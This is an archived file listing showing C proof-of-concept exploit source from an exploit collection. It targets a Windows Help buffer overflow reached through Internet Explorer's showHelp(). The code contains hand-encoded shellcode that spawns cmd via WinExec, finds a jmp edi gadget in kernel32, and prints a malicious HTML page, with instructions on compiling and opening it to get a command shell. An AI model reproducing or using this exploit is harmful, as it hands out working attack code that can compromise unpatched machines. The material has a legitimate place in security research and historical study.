Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / ex.c < prev next >

Wrap

Text File | 2005-02-12 | 4KB | 134 lines

/* By ipxodi@whitecell.org 10.07.2002 prove of concept code of Windows Help buffer overflow. Bug discovered by For tech detail see "Thor Larholm security advisory TL#004". To Use: cl ex.c Run as: ex > ex.htm start ex.htm (be sure to set iexplore as your default htm viewer.) You will get a cmd shell. Tested on IE 5.5, IE5.5 SP2, IE 6.0. other version untested. */ #include <windows.h> #include <stdio.h> char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x03" "\x80\x6D\xF8\x50" "\x8D\x45\xFC\x50\x90\xB8" "EXEC" "\xFF\xD0\x33\xC0\x50\x90\xB8" "EXIT" "\xFF\xD0\xC3"; char shellcode_encode[] = "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x53" "\x80\x6D\xF8\x50" "\x8D\x45\xFC\x50\x90\xB8" "EXEC" "\x2C\x78" "\xFF\xD0" "\x41\x33\xC0\x50\x90\xB8""EXIT" "\x2C\x78" "\xFF\xD0\xC3"; void EncodeFuncAddr(char * shellcode,DWORD addr,char * pattern) { unsigned char * p ; p = strstr(shellcode,pattern); if(p) { if( *(p+4) == '\xFF' ) memcpy(p,&addr,4); else { if((addr & 0xFF) > 0x80) { memcpy(p,&addr,4); *(p+4) = 0x90; *(p+5) = 0x90; }else { addr += 0x78; memcpy(p,&addr,4); } } } } int ModifyFuncAddr(char * shellcode) { char * temp="0123456789ABCDEF"; HMODULE hdl; unsigned char * p ; DWORD pAddr_WinExec ,pAddr_Exit ; hdl = LoadLibrary("kernel32.dll"); pAddr_WinExec = GetProcAddress(hdl,"WinExec"); pAddr_Exit = GetProcAddress(hdl,"ExitProcess"); fprintf(stderr,"Find WinExec at Address %x, ExitProcess at Address %x\n",pAddr_WinExec,pAddr_Exit); EncodeFuncAddr(shellcode,pAddr_WinExec,"EXEC"); EncodeFuncAddr(shellcode,pAddr_Exit,"EXIT"); } void Validate(char * shellcode) { unsigned char *p, *foo = "\\\/:*?\"<>|"; for(;*foo;foo++) { p = strchr(shellcode,*foo); if(p) { fprintf(stderr,"ERROR:ShellCode Contains Invalid Char For File name: %s\n",p); } } } #define Valid(c) (c>0x30) int FindCode(char * code) { DWORD addr; unsigned char * p = (unsigned char * )LoadLibrary("kernel32.dll"); for(;p < 0x77f00000;p++) if(memcmp(p,code,2)==0) { fprintf(stderr,"Find Code at Address %x\n",p); addr = (DWORD) p; if( (addr &0xFF )>0x30 && ((addr>>8)&0xFF)>0x30&& ((addr>>16)&0xFF)>0x30 && ((addr>>24)&0xFF)>0x30 ) return p; } return 0; } int main(int argc, char ** argv) { char * prefix = "<script type=\"text/javascript\">showHelp(\""; char *postfix = "\");</script>"; char buff[1024]; int mode = 2; char * pCode = buff, *shell; DWORD addr; int offset = 784; if(argc > 3 ) { printf("Usage: %s [mode] [offset]",argv[0]); printf("Normal: %s 1 784",argv[0]); printf("Advanc: %s 2 784",argv[0]); exit(0); }else if(argc == 3 ) { offset = atoi(argv[2]); mode = atoi(argv[1]); }; fprintf(stderr,"Mode %d, Using Offset %d\n",mode,offset); memset(buff,0x41,1023); memcpy(pCode, "A:\\\xC0",4); //cmp al,al as a nop. switch(mode) { case 1: shell = shellcode; break; case 2: shell = shellcode_encode;break; case 3: { sprintf(buff +offset, "abcd"); printf("%s%s%s",prefix,buff,postfix); return ; } } ModifyFuncAddr(shell); Validate(shell); memcpy(pCode+0x10,shell,strlen(shell)); pCode = buff + offset; addr = FindCode("\xFF\xE7"); // jmp edi *(int*)pCode = addr ? addr : 0x77e79d02; *(pCode+4)=0; printf("%s%s%s",prefix,buff,postfix); }